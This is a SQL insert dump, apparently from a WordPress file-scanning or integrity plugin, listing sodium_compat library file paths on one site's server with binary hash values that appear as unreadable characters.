('A;Øª\Z¼¾–Ü¦ïz«', 'wp-includes/sodium_compat/lib/constants.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/constants.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á½¼ß{â»#…²lÅ>m', '¬æÙ¹mc(ÍlÚåû''ÑmtÛË£•[”Ìg¹èW', '', 0, '?'),
('\0?Hê\0ÊE}ý¿¦³ç"â', 'wp-includes/sodium_compat/lib/namespaced.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/namespaced.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '01ÕÎèø”vnGœ¬\r ', ']/r~úÊºO‚›‡Cîc§xB…€j/ëoµ˜UÙI*Ù', '', 0, '?'),
('Pµá\nÿe¡äðuµ"í', 'wp-includes/sodium_compat/lib/php72compat.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/php72compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìpêW·Ÿd¢Ýtÿé1Ä', '¢Dã³Œß*ðz6Ø•(A\\×Í)¾i…ÃÜœ¾o,', '', 0, '?'),
('Ã‚uJõMí/€ w·y', 'wp-includes/sodium_compat/lib/php72compat_const.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/php72compat_const.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ðp{áî¡[•´Ë”·	', 'À9çoóøšáêG’fÈpmeGó#`­:Qü{`¶', '', 0, '?'),
('ÖÜÏBûØW‹éÊk\rZ{½¥', 'wp-includes/sodium_compat/lib/ristretto255.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/ristretto255.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'a3³pwypo÷|iËÍ', '$ú	3¯­Ÿâo3ø83… ìiƒQ´\Z)[µe¶', '', 0, '?'),
(',!#Q–ƒP[;º•›Ä', 'wp-includes/sodium_compat/lib/sodium_compat.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/sodium_compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÄÉÔè&~ƒ.¶¶ï@Y$', 'bŽY¸u"]øóòF‘÷Oi‡<è^&¾!l*ïÁ~\0f¼5', '', 0, '?'),
('²•Ž²âCŸ	#a¿“SÎ[', 'wp-includes/sodium_compat/lib/stream-xchacha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/lib/stream-xchacha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ãÇÛ^=©$£ëTœ¿³', '/~Uô]ÜÙNn¦<!¤–"žFm™‹§ÿÞ7Ý*\0r', '', 0, '?'),
('zˆm•SAý}I¼þ´)', 'wp-includes/sodium_compat/namespaced/Compat.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Aòiêk²/Êå¿j\rnŽ3', '1À''§¶‡Õ».ìOÐà}5ºAfi¤~¢>î:}s', '', 0, '?'),
('èwj0‚¢67˜³„@ùT', 'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"êŒ2s7¬ø\\ïi#—ËE', 'aÇÜØ„ÓÞt¹ÀWñÂ	Ì3NŠ\ZÆã`x†hIÝ`À', '', 0, '?'),
('vi™fuPâª0^ù>d¨Ô', 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÂËSG°ÎËº““F¿„Ã', '[Þ(˜®R¸ŒêäëìôŠ$¦£2oåãtûb÷ç', '', 0, '?'),
('B^æÇt›p„k€Œòÿ!ú', 'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'RÙ*LÓTGâé4%P‰´¹', '-–‹ÙÖ©nFJ­&TÓP•o\\Ï“\\Ž¹¿æ2–íß', '', 0, '?'),
('K¹¿ã \r\\Uz÷õ\Z:''', 'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ìVÅ*ûÊFè°¯ñ<Ž¤l', 'åÂ®¢R”l–UñÙ ™wz×ank–ÇGÞtº3î', '', 0, '?'),
('7²‡o^lÊ:ÒËB', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '˜Á	ŒæI¥Ý¶3‚‹S', '!MÚ’Þ«Dw£•éÞwe(²!Îäö=ïéÞ¨dàÖ,GW', '', 0, '?'),
('ÇÂ^¿xð¤JB\ZÍ3-«6', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G–þ5]{"•¼ã«VØ', '¨CËJr~Wè„OY…*[ó:[j)«²ÂGýÐ„ÖeŠ', '', 0, '?'),
('\Z´ð) ”%iyƒÎ´', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '}+#z,¯èeßrEJ-', 'sfºÜq@µÚ8¼!yW¥&Ú”AÈ+/ÅuY•†œ44œG', '', 0, '?'),
('ÎP|ÙÚ’ü‡žó\\Ão', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆ „w^ã®³]ç·£M', '•«ò°Áñ÷§ZEüOë´7(­nY›îhîË¨ƒ‡', '', 0, '?'),
('h®Ë~cTOo¶y4|', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¯f"ü»Œç#6${ JL''"', 'ËeÅ‡Ž6\Z(«qË&…Ú¶¬íÂ]œÌÆ\n÷Cli‡Þ©‡', '', 0, '?'),
('å³³$¿ @z6§\0`’Ñ/ª', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Õ‹}çïB°÷HÀÖ71', 'Ã"Ã÷beTb¿$àÖæ‚Ö×‰ù\n…º°~½lnÝÅ', '', 0, '?'),
(';×vð0BK¬¤µÄ1Ð´', 'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®+o~˜¤XüåÝ“\0Í', 'xX·Ñ¹Ú$6ÜUdZ$üÖæx—Á¤ßØ&3×', '', 0, '?'),
('4×31@¿*rëØÓÃ÷²8', 'wp-includes/sodium_compat/namespaced/Core/Curve25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Curve25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'òÅ›ñLå\\óPÚœÊU', 'c>Ñ5¨o“»Ž½Ðïð½ƒ°_°T9“L~;²e7Ü', '', 0, '?'),
('ŠkIKÁ˜„ÒV[„´	5©', 'wp-includes/sodium_compat/namespaced/Core/Ed25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Ed25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'É¥v>ÎÅ#«‰!nÁ(', 'ÝDFUu|év©·/â]Ð2x_ERL2QlP93s	¶15©', '', 0, '?'),
('‹ŒÍØ¨&Gé¦)šk{ìè¨', 'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬‚háüýP«Ôì', 'KçØÎˆdù%±.RAOôF¾Þ×ââàÁ·joù-', '', 0, '?'),
('ÊîOå¿¯uRòûÒcÁ[j', 'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[clër‹u©	ÃÐ¡u^', '6pËÓ''`À+*[AGà4Šüúü^6ÅŠ£è%ÔÁC', '', 0, '?'),
('êr@¤ÈD¾‹ZÐä¯©', 'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š!Kå	5y¼¡S*', 'Îý¿ˆTy‡Oî%u;ÈUì“}ãgæü1Ÿï)˜ÝZÃ', '', 0, '?'),
('Ž7ÿ0¥ìÁÁ,š		M', 'wp-includes/sodium_compat/namespaced/Core/Poly1305.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Poly1305.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Qy¾„£?¿;é8žV\nø', '\0Ç-ØÞ]ë®³‡•XEt)˜`ÉÅ1ØCý}Mr2Ý/', '', 0, '?'),
('rtŸIÂŒg[¼Ë; õì?', 'wp-includes/sodium_compat/namespaced/Core/Salsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Salsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rVÞN…ck0ã}/õÕƒå', 'nëK ÐkZÂÖ	À—ò± N$ Ÿ EÐš¹×eØ$', '', 0, '?'),
('®6« œ?á›^oï»#ý', 'wp-includes/sodium_compat/namespaced/Core/SipHash.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/SipHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'r-äeÅúör^©!ƒ~', '…î`”ƒRélÔ¥Lzã?iÂÄACHÓóž®£Pyén', '', 0, '?'),
('3pƒ½ã\\Â8ŽlD¦q', 'wp-includes/sodium_compat/namespaced/Core/Util.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Util.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';ó*·kLwB£ædÝ=', 'ec[d”M?HÓ|ÞKYž\04‹°@˜ QAŒ›:FF ï', '', 0, '?'),
('Ë5V›xÇ,$¾>7dýk»', 'wp-includes/sodium_compat/namespaced/Core/X25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/X25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ú¸búò¯9ô°‡±M', 'éF©/''¡€M%”9ô }@¬ÎfW£>Œ–S*­m', '', 0, '?'),
('xïz#è]”rŒu?0Ÿ®Où', 'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hß‹Õg`É¸:Ú•^', '½•ŸF/Q°H\0ù¦æ^l 0¡BÎ“Õ«6S@Phë', '', 0, '?'),
('šµÂ2¼Ýôø:ý¬”¡·', 'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…b4Ç''¡—&ëŸð', 'Û¼ó›Š4P''ô¢ÑáhNêaë>·¨ÛEþ5à°›', '', 0, '?'),
('ŽiŠ©µBÈjßÞöÖï]', 'wp-includes/sodium_compat/namespaced/Crypto.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/Crypto.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—G8©J+œô³‹	¾ z', '>8œ©¸''XëiÔUbýGÐ½Ø,<T`6ä¹È4Ðð', '', 0, '?'),
('ê0Jé”ÇÁéÍfx°#X{—', 'wp-includes/sodium_compat/namespaced/File.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/namespaced/File.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']ÖmÇwè/æ\\Æy5Ú', '»Ét‰d7–Hñ†}=·ù.t“âCw$–`cºÀ''ü', '', 0, '?'),
('õ*÷1¶Gé«víLßŸnŒ', 'wp-includes/sodium_compat/src/Compat.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\Z °ß"½‘Ð˜\rC6º', 'uÇØ\n×@ÝŒ.ŠÛRÀóòŒ#j¾²!YÂIW¢¹', '', 0, '?'),
('ÿQS¾2õ#ÍÃÁ]¸srtÔ', 'wp-includes/sodium_compat/src/Core/BLAKE2b.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/BLAKE2b.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'âƒŽ¦wÓl¹\0¼pA', 'Ó+ÄÆ1,Þ3-„OETožÖdÍÙÃ›Õšcå?î<ª', '', 0, '?'),
('*×&C:[¾¥ñrÕ9‹Né', 'wp-includes/sodium_compat/src/Core/Base64/Common.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Base64/Common.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'PÛÈefè§ÄõÊiª''ÒjW', '6þ°UmÐ–²%Ïì?MˆS°A^=®X ª|U–Ã', '', 0, '?'),
('Ú''£Ýø7ìbâä~ 6', 'wp-includes/sodium_compat/src/Core/Base64/Original.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Base64/Original.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ò£-ï‚ýèÞÑ‚ðº±', '±9\0zotˆID:\0¹›ê·Égä I%á~Þ¦$o', '', 0, '?'),
('=J¬¦Ç°jaŒ}LI‰Z', 'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '±ÀpFõñt1Æ+öÀ»', 'þ;‰}ÛüÇ\0[·ž¾''\rqÎÄáÚÜÄ¥dÝ;#æ°.', '', 0, '?'),
('ë0Üšî¹Z´I·ä¸±N', 'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›oP/Ÿ¸ºæNC.3ÃÀ¿', '®IùCKø]™sXñ\0µÞJnªvŠžj2ƒTþ.}hG', '', 0, '?'),
('Œ¸¦ISU`u€´úTòÀÊF', 'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'élˆ{ÃbOsé“_aºÞ>', 'mõn5ñËßÖžÎ²gJÙü\\µý«¾Ú3†òãõÈ', '', 0, '?'),
('&Dç¥÷Q£RÈÐw£]', 'wp-includes/sodium_compat/src/Core/ChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/ChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åÆ-r‡jiIÞØ£eŠb', '”¥bëÆE·ÖèÚ&q¶þÿçª€*‚–‡…Èøîø±', '', 0, '?'),
('±ð$[ßûÜtCÅ¤Iw', 'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'þQtúªz¯×Q¾ÂóÝ"', '}äØŸZl’(y´“0áÅ¨z“7{šd6YnrhÅÏ\\', '', 0, '?'),
('øD=ŸË÷‡ŠèÖSºÛC', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ù%ôX¤ö°•Ð`Ð¹KZ', 'SµW ð,ªè´f¤Ã×K{®ÿ\\™ÐþÕØàŽò×^Y/¨', '', 0, '?'),
('z¢šå‘L©£5	g5µÄŽ¬', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 't×rèI¦±¯bw''-7íš', '³u©SÕ{•ü<ø“ôn\rß…+-#²;»á·ƒQÐ®', '', 0, '?'),
('yOž\0yjùeB\nVpÈûð', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–Eí¯·äƒÆ€küvk¢¥\r', 'ð¾Š¥iiLM»P µ¬4ÚöÞ¨O_!üÍø“iN	»', '', 0, '?'),
('ž÷Šï©ÁÈUÑ\\™aE', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–w¸•Í±Àör0 êØ…=æ', '?EÜ%÷ë+Ž›„±Èw\rä^ßÖ—.$â‘i‘$[W', '', 0, '?'),
('ÑuRl£tÐÝÍÀ´"“Ñ', 'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'üíû7ÖŠi[L¯9ÆH	¥', 'ß¹{8(ü•Ãatûÿ\0CÔn3Qí„Ú¤\n‰l?¼$yñ', '', 0, '?'),
('Rj¦qñ¡IÓ\Z®Y&ý', 'wp-includes/sodium_compat/src/Core/Curve25519/H.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/H.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆîÌ0\rJ`Xç½"8¾by', 'oHi©¿YƒN3	>­Å÷ôÝ_”Õöœ¾JŒ,®·–S^', '', 0, '?'),
('ôÿöÏß]¨R>Üw.’EQ', 'wp-includes/sodium_compat/src/Core/Curve25519/README.md', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519/README.md', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y¢ªÏ›ÑvjŸ×\nÀ…Ï', 'ãSÓx–^öV>mÐ!-ªqì÷ÌñDÙeVÑßÎÈè', '', 0, '?'),
('á•µ7\\Fû|‹[Eª„çl', 'wp-includes/sodium_compat/src/Core/Curve25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Curve25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Î¶=·`Ûv\ZC÷­', 'x¢Ö«Ó¡U\ruXºaLÉq&ÒóŽ”Ì\0“-ìÖN', '', 0, '?'),
('5.=¹€d)<peu™s^', 'wp-includes/sodium_compat/src/Core/Ed25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Ed25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'yÀEýúFß)?4umüµ¢â', '¬q¬÷ô¸ëzôpõ5\Z“½UPP÷ç‚˜±|qï$/t', '', 0, '?'),
('ii·Â"oýCÈ„³×`', 'wp-includes/sodium_compat/src/Core/HChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/HChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[Rz@ëMMQmr÷ƒ…', '±qÀ‘òX9Oøþ¡a4ÁA¯ÞæÀÄÏ''ôøòÝÌ¾e', '', 0, '?'),
('“lüt:{0+7à9Cý', 'wp-includes/sodium_compat/src/Core/HSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/HSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñÓHx+Ú07¸™`®}ô', '@qz´jØI¯™áæ \0D¼a¶W»¬6nÍ{Š£¶yß', '', 0, '?'),
('9k¹sBÂÎ=}ÕíTÅƒc7', 'wp-includes/sodium_compat/src/Core/Poly1305/State.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Poly1305/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”C’Ï\0Ên`„àü„i>]…', 'ßÿ¤øÂÂŒ„øåqÍã‹µ ý‡''N¥N{Q“àN', '', 0, '?'),
('þî.ˆ ”Iî\nfqñM9', 'wp-includes/sodium_compat/src/Core/Poly1305.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Poly1305.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!ðiœÑL³V=X+²	v0~', '4çÎ-<4®,"V²È±XÊ˜Ã®ÊhR—	KþFëk¡', '', 0, '?'),
('Ì¸¿¬™-]\ZŸ—‰nü', 'wp-includes/sodium_compat/src/Core/Ristretto255.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Ristretto255.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k9÷wZÖê~˜¹ øô''', ' z¾`WN?]ýÓŸB,K„õÈJl´êŠW±¨>k¡', '', 0, '?'),
('ÄÑºÉ©•‚uyâÒïÛ}', 'wp-includes/sodium_compat/src/Core/Salsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Salsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '®¹£b5lJå#ûšõv', 'c=0ïŒ-#Ž-TäSÅX†&ž´4¡äï\0ÈK8\r', '', 0, '?'),
('¬ósC<‰:ƒ†æ<ÎAÐ', 'wp-includes/sodium_compat/src/Core/SecretStream/State.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/SecretStream/State.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éëõé:ÇZ{ãðë5²o', 'ÁúÇ<å€så6´÷\0,	Raô­uhXðåcðØ×', '', 0, '?'),
('%.–.Ctí=áêÐê\\`', 'wp-includes/sodium_compat/src/Core/SipHash.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/SipHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öcJ>|Eqv0|bv‡Ã ', 'ÜŸ÷jÆpeòM¨N«?”ìÎaÁÒXi+!S‰2', '', 0, '?'),
('ªJ-ç‹ºÔ\\"ý×¥&ð', 'wp-includes/sodium_compat/src/Core/Util.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/Util.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&RÐ„síøâuT-&3B§', 'çDô¾Çy)?€Ü3´>''9''qu|D7–+à³C', '', 0, '?'),
('\0G¸¥àM(çÒYlWzã!', 'wp-includes/sodium_compat/src/Core/X25519.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/X25519.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pZú˜£ËÄ:!„Ù¼Ñ', '3í³l¦@Ùä™ú—o£-É3ö–ýS¦ÌàÕ&Ê!Ð', '', 0, '?'),
('ËÇ†ÜQ½_yœdö+£', 'wp-includes/sodium_compat/src/Core/XChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/XChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'X†ñU iU0Æll9ýc', 'þ_Òv$í¸U7_‘*\r?¬+ó^÷Œâ‰¾¾Ä€', '', 0, '?'),
('ûðˆÏX€n\r÷æ?ƒÈ', 'wp-includes/sodium_compat/src/Core/XSalsa20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core/XSalsa20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'p÷¦Æ®¹u¯„o7;~z', '™¥¯ÚÈ %lòy½''#[‰ö€_ò{E½]8%Ü', '', 0, '?'),
('û€¶Ð¬çpšIÒÆYR', 'wp-includes/sodium_compat/src/Core32/BLAKE2b.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/BLAKE2b.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'FéKŠžyä"ïJøÚÏ', '~TÓ»)_º¡€Ô‡ÀˆYH+Õ´ÑÉ''û	;', '', 0, '?'),
('g”\Z˜ ÍÅžþí|qš(', 'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŸzWî±Mžê&˜8Ç3â6', 'TR@peÓÖùS`F¿a×±C«>+öVˆ%Éú8íJyQ', '', 0, '?'),
('„°ŽeÙž-\n¶yV', 'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©‰|®Wwšb>EÏòyJ', '‚''À²Ž¯­~À6È\nBŠºÂagÂzùÁëdÃëQ', '', 0, '?'),
('ŸÚv½á#q¸ò´ÈƒÙ', 'wp-includes/sodium_compat/src/Core32/ChaCha20.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/ChaCha20.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—EOxÙ•XÚ2ë–­Øƒ', 'x¨×aJNù!e±¬×""Nqê}ç«AMCû1)®º{€j', '', 0, '?'),
('•…¸I	2ŸRýNjYÿã', 'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Æc+9OËšdøÜ/ÈR\n', 'à>©à‚áæ–s¹$¥»Ëý/³ïäC è­yù§ùv¹', '', 0, '?'),
('Â=©¼†}ÿLsQ\n`q&', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[M/*ŽµEæ<säWÜRG', '\nðÁ\\‚¯XÎ°Ö¨P’°AåÂ—\nXjð''£;qý{¬‡aÖ', '', 0, '?'),
('ÍíS»>s»U)€¹¤ÍH', 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', '/home/equipm11/public_html/happythinking.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°y$NXÒŸîl€±l', '[ìŽ-©¹Âv5<ÛåM\ná¦Ë+B»u.,Ô5g', '', 0, '?'),
